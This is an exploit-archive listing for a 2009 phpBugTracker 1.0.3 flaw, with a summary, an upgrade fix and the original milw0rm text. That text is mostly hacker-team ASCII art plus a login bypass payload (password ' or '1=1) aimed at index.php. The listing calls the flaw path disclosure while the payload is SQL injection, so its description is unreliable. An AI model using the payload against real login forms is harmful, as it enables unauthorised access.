header-logo
Suggest Exploit
vendor:
phpBugTracker
by:
ByALBAYX
7,5
CVSS
HIGH
Path Disclosure Vulnerability
200
CWE
Product Name: phpBugTracker
Affected Version From: 1.0.3
Affected Version To: 1.0.3
Patch Exists: YES
Related CWE: N/A
CPE: a:phpbt:phpbugtracker
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

phpBugTracker 1.0.3 Path Disclosure Vulnerability

A vulnerability in phpBugTracker 1.0.3 allows an attacker to gain access to the application's path by sending a specially crafted HTTP request. By exploiting this vulnerability, an attacker can gain access to the application's path and use it to launch further attacks.

Mitigation:

Upgrade to the latest version of phpBugTracker 1.0.4 or later.
Source

Exploit-DB raw data:

@~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@
@~~=Author   : ByALBAYX

@~~=Website  : WWW.C4TEAM.ORG
@~~===============TURKISH=================~~@

              _.--"""""--._
            .'             '.
           /                 \
          ;       C4TEAM      ;
          |                   |
          |                   |
          ;                   ;                   ByALBAYX
           \ (`'--,    ,--'`) /
            \ \  _ )  ( _  / /                 WWW.C4TEAM.ORG
             ) )(')/  \(')( (
            (_ `""` /\ `""` _)
             \`"-, /  \ ,-"`/                       
              `\ / `""` \ /`
               |/\/\/\/\/\|                      
               |\        /|
               ; |/\/\/\| ;
                \`-`--`-`/
                 \      /
                  ',__,'


@~~=======================================~~@
@~~=Script   : phpBugTracker 1.0.3

@~~=S.Site   : http://phpbt.sourceforge.net

@~~=Demo     : http://phpbt.sourceforge.net/demo
@~~=======================================~~@

@~~=Vul :

@~~=http://c4team.org/ [Path] /index.php

@~~=Email     : xxx@c4team.org

@~~=Password  : ' or '1=1

@~~=======================================~~@

@~~=:/

# milw0rm.com [2009-05-26]

Navigation

Suggest Exploit

Services By CQR